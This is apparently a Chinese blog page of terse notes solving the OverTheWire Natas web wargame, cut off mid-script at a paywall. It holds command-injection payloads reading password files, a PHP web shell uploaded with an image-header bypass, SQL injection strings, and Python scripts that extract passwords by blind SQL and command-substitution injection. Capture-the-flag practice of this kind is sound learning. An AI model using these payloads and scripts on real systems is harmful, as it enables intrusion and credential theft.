Overthewire--natas

最新推荐文章于 2024-05-21 21:00:45 发布
VIP文章 最新推荐文章于 2024-05-21 21:00:45 发布
阅读量849 收藏 3
点赞数
分类专栏: Bug Bounty OverTheWire CTF 文章标签: bug 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mengzh620/article/details/130463716
版权

3 Not even Google will find it this time
http://natas3.natas.labs.overthewire.org/robots.txt

4 tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

change refere:

9 command injection
;cat /etc/natas_webpass/natas10
; is to seperate the grep -i command

  1. command injection
    . /etc/natas_webpass/natas11

<?php function xor_encrypt($in) { $key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff")); $text = $in; $outText = ''; // Iterate through each character for($i=0;$i

nano natas11.php

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas12.natas.labs.overthewire.org/ -F “[email protected]” -F “filename=natas11.php”

burpsuite:
change jpg to php

nano natas11.php
GIF87a

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas13:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas13.natas.labs.overthewire.org/ -F “[email protected]” -F “filename=natas11.php”

burpsuite:
change jpg to php

Content-Disposition: form-data; name=“filename”

rc74vy46dy.php

  1. sql injection
    "+or+1=1#

15 sql injection

username=natas16"+AND+LENGTH(password)>n#
username=natas16"+AND+substr(password,1,1)+like+binary+“%A%”#

BINARY when sql injection is not sensitive to the lowercase and uppercase

n=32

TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

target = ‘http://natas15.natas.labs.overthewire.org’
charset_1 = “adfgijklqruADEHOPRTVZ23579”

password = “”
while len(password) != 32:
for c in charset_1:
t = password + c
username = (‘natas16" AND password LIKE BINARY "’ + t +‘%" "’)
r = requests.get(target,
auth=(‘natas15’,‘TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB’),
params={“username”: username}
)
if “This user exists” in r.text:
print ('PASS: ’ + t.ljust(32, ‘*’))
password = t
break

16… import requests
from requests.auth import HTTPBasicAuth

auth=HTTPBasicAuth(‘natas16’, ‘TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V’)

filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’
for char in allchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ’ + char + ’ /etc/natas_webpass/natas17)’, auth=auth)

if ‘doomed’ not in r.text:
filteredchars = filteredchars + char
print(filteredchars)

for i in range

最低0.47元/天 解锁文章
DaisyDragonD
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
纳塔斯 overthewire 战争游戏 natas 的解决方案集合
OverTheWire-Natas
LJFYYJ的博客
07-23 845
natas前17关,待更新~
网络空间安全——Wargame靶场(Natas)
weixin_44717952的博客
05-20 978
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
OVerTheWire:NATAS通关0-20
friutUncil的博客
09-30 986
LV0 natas将是一些服务端的安全基础知识,ok,试一下吧 You can find the password for the next level on this page. 打开就是这句话,在此页能找到密码,但是找不到呀,那就看下源码吧 F12 再注释里找到密码 The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto LV...
Metasploit - auxiliary/gather/zoomeye_search
热门推荐
Nixawk
10-19 47万+
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
JZOJ 幽幽子与森林
Cold_Chair的博客
02-28 1万+
题目大意: 迷途竹林可以看成是一个n个点的森林,幽幽子定义dis(u,v)为u到v路径上的边的数量,若u和v不连通则为m。她定义整个森林的危险度为 为了去拜访永琳师匠,幽幽子需要提前知道迷途竹林的危险度。但迷途竹林的形态是时刻变化着的,所以幽幽子希望知道危险度的期望是多少。 为了避免浮点运算,答案对998244353取模。 1&lt;=n&lt;=2e5 题解: 这个计数写得真的是累。 很容易想到...
overthewire-natas
strider1123的博客
09-15 128
一个训练web的小网站:https://overthewire.org/wargames/natas/ 类似于ctf题,不同的是拿到的不是flag而是下一道题的密码 第一关给出了默认密码,进入后查看源码获得natas1密码:g9D9cREhslqBKtcA2uocGHPfMZVzeFK6 将url中的0改成1,使用natas1用户名和刚才的密码进入到natas1关卡中 禁用右键,没什么...
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas解决方案 我熟悉了网站,该网站逐步讲解了服务器端Web安全的基础知识。 在此存储库中,我尝试放置其解决方案。
Python库 | natas-1.0.2.tar.gz
03-06
python库。 资源全名:natas-1.0.2.tar.gz
pentest-notes
05-25
-current-user --dbs sqlmap -u“ ” --string =“此用户存在” --auth-type = Basic --auth-cred = natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J- -data“用户名= natas16” --level = 5-风险= 3 -D natas15 -T用户-...
natas:纳塔斯兵棋推演
06-04
curl --silent --user natas0:natas0 http://natas0.natas.labs.overthewire.org | grep " password for natas1 " 纳塔斯1 curl --silent --user natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.
【FixBug】超级大Json转POJO失败
whereabouts_的博客
05-21 60
超级长Json转POJO失败解决思路
共享内存bug
最新发布
guoguo0524的博客
05-21 194
/在使用std::queue<Persons > 时,当struct Persons 中Person all[12345678];// 如果需要关闭共享内存对象,请在这里添加 CloseHandle(hMapFile);INVALID_HANDLE_VALUE, // 使用分页文件。// 创建一个sizeof(data_share_memory_group)字节的共享内存。// 共享内存和互斥锁的名称。// 共享内存文件映射句柄。//锁定要共享内存 和 复制共享内存的空间。
概念+bug
Shootingmemory的博客
05-17 885
增量模型是将一个大的需求变成小的功能,然后将每个功能逐个开发几乎完整再上线。迭代模型会上线一个基础版本,但是基础版本所有的功能都有但是非常简陋,之后再迭代优化上线。一般都是两个一起用,不具体区分迭代模型和增量模型。
欣赏一个尚未关闭的python运行时bug
含光左卫的工作笔记集
05-15 248
python sharedmemroy跨进程使用时的运行时bug,讨论,及修复。
bug】Error: java: 错误: 不支持发行版本 5
wosixiaokeai的博客
05-18 141
找到以下位置修改jdk版本,修改前↓。
vmware 17pro17.5 bug 严重,建议升级17.52
i_9420的博客
05-17 207
我的系统是WIN11 跟VMWARE17.5..近日莫名其妙的发现即使什么都没运行,GPU占用也高达20%。开始因为中毒了,后面看到VMWARE的这个更新,抱着试试的心态,更新到最新版本。近日vmware发布17.52 更新,修复了一个重大BUG.也就是莫名其妙的CPU跟GPU占用问题。BING GO,问题解决。
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值